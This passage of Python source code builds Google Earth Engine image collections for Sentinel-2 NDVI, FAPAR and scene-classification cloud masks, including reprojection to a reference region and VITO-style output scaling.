congruent with reference product)\n determine reference projection (to obtain specified resolution)\n collect the specified ee.ImageCollection\n reproject and rescale this ee.ImageCollection\n add some properties to the resulting collection:\n - 'gee_refroi' : ee.Geometry - used as region parameter for exports\n - 'gee_centerpoint' : ee.Geometry.Point - debug\n - 'gee_projection' : ee.Projection - used to shrink the exported region a little, and to find the scale parameter for exports\n - 'gee_description' : string - used to brew filenames for exports\n \"\"\"\n\n #\n # find reference collection\n #\n if isinstance(refcollection, ee.ImageCollection):\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: reference collection specified as ee.ImageCollection\")\n _eerefimagecollection = refcollection\n elif isinstance(refcollection, GEECol): \n if verbose: print(f\"{str(type(self).__name__)}.getcollection: reference collection specified as {str(type(refcollection).__name__)}\")\n _eerefimagecollection = refcollection.collect(eepoint, eedatefrom, eedatetill, verbose=verbose)\n else:\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: no reference collection specified - using self\")\n _eerefimagecollection = self.collect(eepoint, eedatefrom, eedatetill, verbose=verbose)\n #\n # _eerefimagecollection.size().getInfo() forces the collection to be evaluated\n # if this crashes during the evaluation, this might be retry-able\n # if the evaluation 'works', but results in 
an empty collection, all hope may be abandoned\n #\n if ( _eerefimagecollection.size().getInfo() == 0):\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: empty reference collection.\")\n raise geeutils.NoRetryEmptyCollectionException(f\"{str(type(self).__name__)}.getcollection: empty reference collection.\")\n #\n # find reference image - assume single band, or all bands having identical projection\n #\n _eerefimage = geeutils.someImageNear(_eerefimagecollection, eedatefrom, eepoint).select(0)\n try:\n #\n # this weird call is expected to throw in case no _eerefimage can be found \n # (e.g. due to an actual _eerefimagecollection outside the 'someImageNear' search range)\n # for strange reasons the _eerefimage will have type ee.Image, even if it is not there\n # and even then SOME calls will pass, while others will throw. \n #\n if (_eerefimage.bandNames().size().getInfo() > 0): pass\n except Exception as e:\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: no reference image found. Exception: {str(e)}\")\n raise geeutils.NoRetryNoImageException(f\"{str(type(self).__name__)}.getcollection: no reference image found.\")\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: selected reference image:\\n{geeutils.szprojectioninfo(_eerefimage)} id:{_eerefimage.id().getInfo()}\")\n\n #\n # find roi center\n #\n if refroipixelsdiameter is not None:\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: specified roi diameter in reference collection pixels: {refroipixelsdiameter}\")\n pass # roi size in pixels of reference collection\n else:\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: no roi diameter in reference collection pixels specified (using destination roi diameter: {roipixelsindiameter})\")\n refroipixelsdiameter = roipixelsindiameter # self acting as reference\n \n _refroipixelsdiameter = round(refroipixelsdiameter) # \"an integer\" I said.\n _refroipixelsdiameter = max(_refroipixelsdiameter, 1) # preferably larger then 1\n if verbose and (_refroipixelsdiameter != refroipixelsdiameter):\n print(f\"{str(type(self).__name__)}.getcollection: specified roi diameter in reference collection pixels ({refroipixelsdiameter}) modified to {_refroipixelsdiameter}\")\n\n if (_refroipixelsdiameter %2) == 0: # even diameter\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: selecting roi center at reference collection pixels raster intersection\")\n _eeroicenterpoint = geeutils.pixelinterspoint(eepoint, _eerefimage) # roi center on refimage pixels intersection\n else: # odd diameter\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: selecting roi center at reference collection pixel center\")\n _eeroicenterpoint = geeutils.pixelcenterpoint(eepoint, _eerefimage) # roi center on refimage pixel center\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: selected roi center:\\n{geeutils.szgeometryinfo(_eeroicenterpoint)}\")\n #\n # find actual roi - roi radius for odd sizes: 1, 2, 3, ... 
- for even sizes: 0.5, 1.5, 2.5, ...\n #\n _eerefroi = geeutils.squarerasterboundsroi(_eeroicenterpoint, _refroipixelsdiameter/2, _eerefimage, verbose=verbose)\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: selected roi:\\n{geeutils.szgeometryinfo(_eerefroi)}\")\n #\n # find roi origin to translate to, to align pixel boundaries with reference roi\n #\n _eerefroiulx = _eerefroi.coordinates().flatten().get(0)\n _eerefroiuly = _eerefroi.coordinates().flatten().get(1)\n #\n # translate and scale reference projection to obtain target projection\n #\n _roipixelsindiameter = round(roipixelsindiameter) # \"an integer\" I said.\n _roipixelsindiameter = max(_roipixelsindiameter, 1) # preferably larger then 1\n if verbose and (_roipixelsindiameter != roipixelsindiameter):\n print(f\"{str(type(self).__name__)}.getcollection: specified roi diameter in destination collection pixels ({roipixelsindiameter}) modified to {_roipixelsindiameter}\")\n \n _eedstprojection = _eerefimage.projection().translate(_eerefroiulx, _eerefroiuly)\n _eedstprojection = _eedstprojection.scale(_refroipixelsdiameter/_roipixelsindiameter, _refroipixelsdiameter/_roipixelsindiameter)\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: destination projection roi:\\n{geeutils.szprojectioninfo(_eedstprojection)}\")\n #\n # find native image collection\n #\n _eenatimagecollection = self.collect(_eerefroi, eedatefrom, eedatetill, verbose=verbose)\n #\n # _eenatimagecollection.size().getInfo() forces the collection to be evaluated\n # if this crashes during the evaluation, this might be retry-able\n # if the evaluation 'works', but results in an empty collection, all hope may be abandoned\n #\n if ( _eenatimagecollection.size().getInfo() == 0):\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: empty destination collection.\")\n raise geeutils.NoRetryEmptyCollectionException(f\"{str(type(self).__name__)}.getcollection: empty destination collection.\")\n #\n # reproject it, to align pixel boundaries with reference roi, in resolution specified by roipixelsindiameter\n #\n _eedstimagecollection = self._reproject(_eenatimagecollection, _eedstprojection, verbose=verbose)\n #\n # apply scaling, clipping, masking,... preparing the collection for export\n #\n if doscaleandflag:\n _eedstimagecollection = self.scaleandflag(_eedstimagecollection, verbose=verbose)\n if verbose: print(f\"{str(type(self).__name__)}.getcollection: scaled collection: {geeutils.szimagecollectioninfo(_eedstimagecollection)}\")\n #\n # add some collection properties (e.g. 
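'gee_refroi' and 'gee_projection';\n        #  on export these are read back roughly as (sketch):\n        #      region = ee.Geometry(collection.get('gee_refroi'))\n        #      scale  = ee.Projection(collection.get('gee_projection')).nominalScale()\n        #  (e.g. 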
used during export)\n #\n _eedstimagecollection = _eedstimagecollection.set('gee_refroi', _eerefroi)\n _eedstimagecollection = _eedstimagecollection.set('gee_centerpoint', _eeroicenterpoint)\n _eedstimagecollection = _eedstimagecollection.set('gee_projection', _eedstprojection)\n if verbose: \n print(f\"{str(type(self).__name__)}.getcollection: set 'gee_refroi' to: \\n{geeutils.szgeometryinfo(_eerefroi)}\")\n print(f\"{str(type(self).__name__)}.getcollection: set 'gee_projection' to: \\n{geeutils.szprojectioninfo(_eedstprojection)}\")\n #\n #\n #\n if True:\n #\n # store intermediates so client can retrieve them for debugging\n #\n self._eerefimagecollection = _eerefimagecollection\n self._eerefimage = _eerefimage\n self._refroipixelsdiameter = _refroipixelsdiameter\n self._eeroicenterpoint = _eeroicenterpoint\n self._eerefroi = _eerefroi\n self._eerefroiulx = _eerefroiulx\n self._eerefroiuly = _eerefroiuly\n self._roipixelsindiameter = _roipixelsindiameter\n self._eedstprojection = _eedstprojection\n self._eenatimagecollection = _eenatimagecollection\n self._eedstimagecollection = _eedstimagecollection\n #\n #\n #\n return _eedstimagecollection\n\n\n###############################################################################\n#\n# Sentinel 2 related products\n#\n###############################################################################\n\n\"\"\"\n\"\"\"\nclass S2sclcppfilter(geemask.IColFilter):\n \"\"\"\n simple filter for sentinel 2 collections, based on scene classification.\n default settings emulate some 'cloudy pixel percentage' filter: maximum 95% pixels have SCL class 8,9 or 10\n typical use in the collect method of sentinel 2 products (GEECol daughter classes)\n \"\"\"\n def __init__(self, s2sclclassesarray=[8,9,10], thresholdpct=-95):\n \"\"\"\n :param s2sclclassesarray: list (python list, NOT ee.List) of the SCL class values to be evaluated\n :param thresholdpct: the minimum (positive thresholds) or maximum (negative thresholds) percentage coverage by these classes ( [-100..100] )\n \"\"\"\n self.filter = geemask.SimpleFilter('SCL', s2sclclassesarray, thresholdpct)\n\n def filtercollection(self, eeimagecollection, eeregion, verbose=False):\n \"\"\"\n :param eeimagecollection: sentinel 2 ee.ImageCollection to be filtered (MUST CONTAIN SCL BAND)\n :param eeregion: region to be evaluated by the filter (would be nice if the eeimagecollection actually covers this region...)\n \"\"\"\n if verbose: print(f\"{str(type(self).__name__)}.filtercollection: input collection: {geeutils.szimagecollectioninfo(eeimagecollection)}\")\n eeimagecollection = self.filter.filtercollection(eeimagecollection, eeregion, verbose=verbose)\n if verbose: print(f\"{str(type(self).__name__)}.filtercollection: resulting collection: {geeutils.szimagecollectioninfo(eeimagecollection)}\")\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2ndvi(GEECol, OrdinalProjectable):\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n \n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n #\n # base collection\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S2_SR')\n .select(['B4', 'B8', 'SCL']) # B4~Red B8~Nir - SCL to allow SCL-based filters\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) filtering\n #\n if self.colfilter is not None:\n eeimagecollection = 
self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # apply ndvi = (nir-red)/(nir+red)\n #\n def ndvi(image):\n return ((image.select('B8').subtract(image.select('B4'))).divide(image.select('B8').add(image.select('B4')))\n .rename('NDVI')\n .copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(ndvi)\n #\n # apply maximum composite in case of overlapping images on same day\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"max\", verbose=verbose)\n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2ndvi')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .clamp(-1,1) # clamp looses properties \n .toFloat() # should be obsolete here, but side effect is no-data as -inf or nan iso 0\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection\n\n\n\"\"\"\nGEECol_s2ndvi with historical vito ndvi scaling\n\"\"\"\nclass GEECol_s2ndvi_he(GEECol_s2ndvi):\n\n def __init__(self, colfilter=None):\n super().__init__(colfilter)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n return super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose).set('gee_description', 'S2ndvi_he')\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n #\n # historical vito ndvi scaling [ -0.08, 0.92 ] -> [0, 250] with 255 as no-data\n #\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .add(0.08).multiply(250).clamp(0,250)\n .unmask(255, False)\n .toUint8()\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection \n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2fapar(GEECol, OrdinalProjectable):\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n #\n # base collection\n #\n # beware: apparently the collection contains some images with missing properties\n # e.g. 
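images missing the MEAN_* angle metadata; a standalone way to spot\n        #      them could look like (sketch, not used by the pipeline):\n        #          nometa = (ee.ImageCollection('COPERNICUS/S2_SR')\n        #                    .filter(ee.Filter.notNull(['MEAN_SOLAR_ZENITH_ANGLE']).Not()))\n        # e.g. 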
ee.Image('COPERNICUS/S2_SR/20190117T061209_20190117T061411_T42TVK')\n #\n # geebiopar.get_s2fapar3band expects 'MEAN_INCIDENCE_ZENITH_ANGLE_B8', 'MEAN_SOLAR_ZENITH_ANGLE', \n # 'MEAN_SOLAR_AZIMUTH_ANGLE' and 'MEAN_INCIDENCE_AZIMUTH_ANGLE_B8' to be available,\n # hence the additional \"notNull\" filter\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S2_SR')\n .select(['B3', 'B4', 'B8', 'SCL'])\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill))\n .filter(ee.Filter.notNull(['MEAN_INCIDENCE_ZENITH_ANGLE_B8', 'MEAN_SOLAR_ZENITH_ANGLE', 'MEAN_SOLAR_AZIMUTH_ANGLE', 'MEAN_INCIDENCE_AZIMUTH_ANGLE_B8'])))\n #\n # (optional) filtering\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # apply fapar network\n #\n def fapar(image):\n return (geebiopar.get_s2fapar3band(image)\n .rename('FAPAR')\n .copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(fapar)\n #\n # apply maximum composite in case of overlapping images on same day\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"max\", verbose=verbose)\n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2fapar')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .clamp(0,1) # clamp looses properties \n .toFloat() # otherwise would be double (Float64)\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection\n\n\n\"\"\"\nGEECol_s2fapar with historical vito fapar scaling\n\"\"\"\nclass GEECol_s2fapar_he(GEECol_s2fapar):\n\n def __init__(self, colfilter=None):\n super().__init__(colfilter)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n return super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose).set('gee_description', 'S2fapar_he')\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n #\n # historical vito fapar scaling [ 0, 1 ] -> [0, 200] with 255 as no-data\n #\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .multiply(200).clamp(0,200)\n .unmask(255, False)\n .toUint8()\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection \n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2scl(GEECol, CategoricalProjectable):\n \"\"\"\n https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_S2_SR\n \n Scene Classification Map (The \"No Data\" value of 0 is masked out)\n 1 ff0004 Saturated or defective\n 2 868686 Dark Area Pixels\n 3 774b0a Cloud Shadows\n 4 10d22c Vegetation\n 5 ffff52 Bare Soils\n 6 0000ff Water\n 7 818181 Clouds Low Probability / Unclassified\n 8 c0c0c0 Clouds Medium Probability\n 9 f1f1f1 Clouds High Probability\n 10 bac5eb Cirrus\n 11 52fff9 Snow / Ice\n \"\"\"\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n #\n # base collection\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S2_SR')\n .select(['SCL'])\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) 
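scl-based\n        # e.g. (sketch) keep only days where classes 8/9/10 cover less than 80%\n        # of the roi, via the filter class defined above:\n        #     sclcol = GEECol_s2scl(colfilter=S2sclcppfilter(thresholdpct=-80))\n        # (optional) 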
filtering\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # apply mode composite in case of overlapping images on same day\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"mode\", verbose=verbose)\n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2scl')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 'S2 half tiles' (e.g. 31UES on '2020-01-29') have limited their footprint to the area \n where data lives, thus *NOT* the full 31UES footprint\n when exporting these images, we'll mask the empty area with 0 - being the SCENE CLASSIFICATION NO-DATA value\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(0, False) # no data to 0 \n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2sclsimplemask(GEECol_s2scl):\n \"\"\"\n remark: \n - original CropSar focused on Belgium. In Belgium snow is rare.\n - scl is not perfect. e.g. in the region of ee.Geometry.Point( 5.3564, 51.3369) there are snow-pixels (class 11) on 2018-07-12 (summer).\n - therefore scl-snow was been masked by default.\n - current codes continuing mission: to explore strange new places, to seek out new training and new evaluation samples, to boldly go where no CropSar has gone before.\n - hence, we'll consider class 11 to be one of the good guys by default.\n \"\"\"\n def __init__(self, s2sclclassesarray=None, binvert=None, colfilter=None):\n \"\"\"\n \"\"\"\n super().__init__(colfilter)\n\n if s2sclclassesarray is None:\n #s2sclclassesarray = [2, 4, 5, 6, 7] # assuming 2,4,5,6 en 7 to be 'valid' classification classes (unlike 'volatile' clouds, saturations, snow,...)\n s2sclclassesarray = [2, 4, 5, 6, 7, 11]\n if binvert is None:\n binvert = True\n \n self.maskmaker = geemask.SimpleMask(s2sclclassesarray, binvert)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # base collection: SCL from parent - already composited (daily) to avoid striping at overlaps\n #\n eeimagecollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n #\n #\n #\n def simplemask(image):\n return (self.maskmaker\n .makemask(image)\n .toUint8() # uint8 [0:not masked, 1:masked] (obsolete ?)\n .rename('MASK')\n .copyProperties(image, ['system:time_start', 'gee_date']))\n eeimagecollection = eeimagecollection.map(simplemask)\n #\n # no mosaic/composite - already done in base collection\n #\n pass\n #\n # add collection properties describing this collection (in this case: overwrites 'gee_description' from GEECol_s2scl)\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2sclsimplemask')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 'S2 half tiles' (e.g. 
31UES on '2020-01-29') have limited their footprint to the area \n where data lives, thus *NOT* the full 31UES footprint\n when exporting masks [0,1] for these images, we'll indicate the unknown area with 255 as no data\n \n 0: not masked (clear sky)\n 1: masked (belgian sky)\n 255: no data (belgian politics)\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(255, False) # no data to 255\n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2sclconvmask(GEECol_s2scl):\n \"\"\"\n \"\"\"\n def __init__(self, lsts2sclclassesarray=None, lstwindowsizeinmeters=None, lstthreshold=None, colfilter=None):\n \"\"\"\n \"\"\"\n super().__init__(colfilter)\n\n if lsts2sclclassesarray is None:\n #lsts2sclclassesarray = [[2, 4, 5, 6, 7], [3, 8, 9, 10, 11]]\n lsts2sclclassesarray = [[2, 4, 5, 6, 7, 11], [3, 8, 9, 10]]\n if lstwindowsizeinmeters is None:\n lstwindowsizeinmeters = [20*9, 20*101]\n if lstthreshold is None:\n lstthreshold = [-0.057, 0.025]\n \n self.maskmaker = geemask.ConvMask(lsts2sclclassesarray, lstwindowsizeinmeters, lstthreshold)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # base collection: SCL from parent - already composited (daily) to avoid striping at overlaps\n #\n eeimagecollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n #\n #\n #\n def convmask(image):\n return (self.maskmaker\n .makemask(image)\n .toUint8() # uint8 [0:not masked, 1:masked] (obsolete ?)\n .rename('MASK')\n .copyProperties(image, ['system:time_start', 'gee_date']))\n eeimagecollection = eeimagecollection.map(convmask)\n #\n # no mosaic/composite - already done in base collection\n #\n pass\n #\n # add collection properties describing this collection (in this case: overwrites 'gee_description' from GEECol_s2scl)\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2sclconvmask')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 'S2 half tiles' (e.g. 31UES on '2020-01-29') have limited their footprint to the area \n where data lives, thus *NOT* the full 31UES footprint\n when exporting masks [0,1] for these images, we'll indicate the unknown area with 255 as no data\n \n 0: not masked (clear sky)\n 1: masked (belgian sky)\n 255: no data (belgian politics)\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(255, False) # no data to 255\n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2sclstaticsmask(GEECol_s2scl):\n\n def __init__(self, s2sclclassesarray=None, threshold=None, thresholdunits=None, statisticsareametersradius=None):\n \"\"\"\n :param s2sclclassesarray: list of s2 scl classes\n :param thresholdunits: \"sigma\", \"percentage\" or \"percentile\" - defaults to \"sigma\" \n :param threshold: threshold value. 
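How it is read depends on thresholdunits; e.g. with \"sigma\" and\n                              threshold=2, a regional mean frequency of 10% and sigma of 5%\n                              mask pixels from 10% + 2*5% = 20% upward. The value\n                              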
can be absolute percentage or based on regional statistics\n            - thresholdunits: \"sigma\":      +/- ]0,4]   - mask if frequency >= mean + threshold * sigma or frequency <= mean - abs(threshold) * sigma\n            - thresholdunits: \"percentile\": +/- [1,100] - mask if frequency >= percentile(threshold) or frequency < percentile(abs(threshold))\n            - thresholdunits: \"percentage\": +/- [1,100] - mask if frequency >= threshold or frequency < abs(threshold)\n            (using values [1,100] to avoid confusion between fractions and percentages)\n        :param statisticsareametersradius: (only for thresholdunits=\"sigma\" or \"percentile\") \n            - specifies the region over which the percentile or mean and sigma will be calculated\n            - actual area is square with radius statisticsareametersradius\n            - this area is assumed to be \"large\" with respect to the actual target region (in .collect)\n        \"\"\"\n        #\n        # super (GEECol_s2scl) WITHOUT filter\n        #\n        super().__init__(colfilter=None)\n        #\n        # s2sclclassesarray\n        #\n        if s2sclclassesarray is None: \n            #self.s2sclclassesarray = [3,8,9,10,11]   # default: in clouds we trust, ... and snow?\n            self.s2sclclassesarray = [3,8,9,10]\n        else:\n            if not isinstance(s2sclclassesarray, list) : raise ValueError(\"s2sclclassesarray expected to be a list\")\n            for number in s2sclclassesarray:\n                if not isinstance(number, numbers.Number) : raise ValueError(\"s2sclclassesarray expected to be a list of integers\")\n                if not (0 <= number <= 11) : raise ValueError(\"ridiculous s2 scl class value (expected [0,11])\")\n            \n            self.s2sclclassesarray = s2sclclassesarray\n\n        #\n        # thresholdunits\n        #\n        if thresholdunits is None: \n            self.thresholdunits = \"sigma\"    # default: threshold based on regional statistics\n        else:\n            if not thresholdunits in [\"percentage\", \"sigma\", \"percentile\"] : raise ValueError(\"thresholdunits expected to be 'percentage', 'sigma' or 'percentile'\")\n            self.thresholdunits = thresholdunits\n\n        #\n        # threshold\n        #\n        if self.thresholdunits == \"sigma\":\n            if threshold is None:\n                self.threshold = 2           # default: strict - lose only about 2.1 % (assuming a normal distribution)\n            else:\n                if not isinstance(threshold, numbers.Number) : raise ValueError(\"invalid threshold\")\n                if not (0 < abs(threshold) <= 4) : raise ValueError(\"ridiculous (stdev) threshold value (expected ]0,4])\")\n                self.threshold = threshold\n            \n        else:\n            if threshold is not None:\n                if not isinstance(threshold, numbers.Number) : raise ValueError(\"invalid threshold\")\n                if not (1 <= abs(threshold) <= 100) : raise ValueError(\"invalid threshold value (expected +/- [1, 100])\")\n                self.threshold = threshold\n            else:\n                if self.thresholdunits == \"percentage\":\n                    self.threshold = 70      # default for \"percentage\"\n                else:\n                    self.threshold = 98      # default for \"percentile\"\n\n\n        #\n        # regional statistics area\n        #\n        if self.thresholdunits == \"percentage\":\n            self.metersradius = 0            # not used with absolute thresholds \n        else:\n            if statisticsareametersradius is None:\n                self.metersradius = 25000    # default: about a quarter of typical s2 tile ( which is 100km x 100km )\n            else:\n                if not isinstance(statisticsareametersradius, numbers.Number) : raise ValueError(\"invalid statisticsareametersradius\")\n                if ( statisticsareametersradius < 500) : raise ValueError(\"ridiculous statisticsareametersradius value (expected min 500)\")\n                self.metersradius = statisticsareametersradius\n        \n    def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n        #\n        #\n        #\n        if verbose: print(f\"{str(type(self).__name__)}.collect: threshold({self.threshold} {self.thresholdunits}) 
area({self.metersradius} radius)\")\n        #\n        # daily mosaicked scl collection\n        #\n        eesclimgcollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n        #\n        #\n        #\n        if self.thresholdunits != \"percentage\": eestatisticsregion = geeutils.squareareaboundsroi(eeroi.centroid(maxError=0.001), self.metersradius)\n        else: eestatisticsregion = None\n        #\n        #\n        #\n        staticsmask = ( ee.Image(geemask.StaticsMask(\n            self.s2sclclassesarray, \n            None, \n            self.threshold, \n            self.thresholdunits, \n            eestatisticsregion, \n            verbose=verbose)\n            .makemask(eesclimgcollection)\n            .toUint8()             # uint8 [0:not masked, 1:masked] (obsolete ?)\n            .rename('STATICS')\n            .copyProperties(eesclimgcollection.first(), ['system:time_start', 'gee_date'])))\n        #\n        # make (single image) collection and add properties describing this collection\n        # \n        szdescription = \"S2sclstaticsmask(\" + str(self.threshold) + self.thresholdunits + \")\"\n        eeimagecollection = ee.ImageCollection(staticsmask).set('gee_description', szdescription)\n        #\n        #\n        #\n        return eeimagecollection\n\n    def scaleandflag(self, eeimagecollection, verbose=False):\n        \"\"\"\n        'S2 half tiles' (e.g. 31UES on '2020-01-29') have limited their footprint to the area \n        where data lives, thus *NOT* the full 31UES footprint\n        when exporting masks [0,1] for these images, we'll indicate the unknown area with 255 as no data\n\n        since staticsmask is supposed to use large date ranges, this actually shouldn't matter here\n        \n        0: not masked (clear sky)\n        1: masked (belgian sky)\n        255: no data (belgian politics)\n        \"\"\"\n        eeimagecollection = eeimagecollection.map(lambda image: (image\n            .unmask(255, False)            # no data to 255\n            .toUint8()))                   # actually obsolete here\n        return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2sclcombimask(GEECol_s2scl):\n    \"\"\"\n    convmask using staticsmask as ignoremaskimage to exclude 'abnormal' pixels from convolutions\n    \"\"\"\n    def __init__(self, \n                 conv_lsts2sclclassesarray=None, conv_lstwindowsizeinmeters=None, conv_lstthreshold=None, colfilter=None,\n                 stat_s2sclclassesarray=None, stat_threshold=None, stat_thresholdunits=None, stat_statisticsareametersradius=None, stat_idaysbackward=None):\n        \"\"\"\n        \"\"\"\n        #\n        # super (GEECol_s2scl) WITHOUT filter \n        # - filtering will be applied on the result (hence after ignoremaskimage has been calculated on the 'complete' collection)\n        # - this does not give completely identical results to GEECol_s2sclconvmask, since now the filter is applied AFTER mosaic\n        #\n        super().__init__(colfilter=None)\n        self.finalcolfilter=colfilter\n        if (self.finalcolfilter is not None) and (not isinstance(self.finalcolfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n        #\n        #\n        #\n        #if conv_lsts2sclclassesarray is None: conv_lsts2sclclassesarray = [[2, 4, 5, 6, 7], [3, 8, 9, 10, 11]]\n        if conv_lsts2sclclassesarray is None: conv_lsts2sclclassesarray = [[2, 4, 5, 6, 7, 11], [3, 8, 9, 10]]\n        if conv_lstwindowsizeinmeters is None: conv_lstwindowsizeinmeters = [20*9, 20*101]\n        if conv_lstthreshold is None: conv_lstthreshold = [-0.057, 0.025] #[-0.057, 0.015]\n        \n        self.conv_maskmaker = geemask.ConvMask(conv_lsts2sclclassesarray, conv_lstwindowsizeinmeters, conv_lstthreshold)\n        #\n        #\n        #\n        #self.stat_s2sclclassesarray = [3, 8, 9, 10, 11] if stat_s2sclclassesarray is None else stat_s2sclclassesarray\n        self.stat_s2sclclassesarray = [3, 8, 9, 10] if stat_s2sclclassesarray is None else stat_s2sclclassesarray\n        self.stat_threshold = 2 if stat_threshold is None else stat_threshold\n        
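# A hedged usage sketch (assumed, not part of the original API) of how this class\n        # could be driven with the defaults below:\n        #   combimask = GEECol_s2sclcombimask(stat_idaysbackward=365)\n        #   eecol     = combimask.collect(eeroi, eedatefrom, eedatetill)\n        # where eeroi, eedatefrom and eedatetill are hypothetical ee.Geometry/ee.Date objects.\n        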
self.stat_thresholdunits = \"sigma\" if stat_thresholdunits is None else stat_thresholdunits\n        self.stat_statisticsareametersradius = 25000 if stat_statisticsareametersradius is None else stat_statisticsareametersradius\n        self.stat_idaysbackward = 365 if stat_idaysbackward is None else stat_idaysbackward\n        \n    def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n        #\n        #\n        #\n        if verbose: print(f\"{str(type(self).__name__)}.collect\")\n        #\n        # obtain staticsmask used as ignoremaskimage in ConvMask.makemask\n        #\n        if self.stat_idaysbackward <= 0:\n            staticsmask = None\n            eesclimgcollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n\n        else:\n            if self.stat_thresholdunits != \"percentage\": eestatisticsregion = geeutils.squareareaboundsroi(eeroi.centroid(maxError=0.001), self.stat_statisticsareametersradius)\n            else: eestatisticsregion = None\n\n            eesclimgcollection = super().collect(eeroi, eedatefrom.advance(-1*self.stat_idaysbackward, 'day'), eedatetill, verbose=verbose)\n            staticsmask = 